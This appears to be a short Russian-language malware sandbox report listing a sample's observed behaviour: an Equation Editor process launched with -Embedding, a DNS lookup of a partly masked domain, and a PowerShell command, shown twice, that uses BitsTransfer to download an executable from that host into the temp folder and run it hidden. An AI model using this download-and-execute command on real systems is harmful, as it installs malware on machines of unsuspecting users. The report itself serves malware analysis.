Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$N=$env:temp+'\hE.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://pe###hack.com/css/page/fr.exe' -Destination $N;(New-Object -com Shell.Application).ShellE...
- DNS ASK pe###hack.com
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$N=$env:temp+'\hE.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://pe###hack.com/css/page/fr.exe' -Destination $N;(New-Object -com Shell.Application).ShellE...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding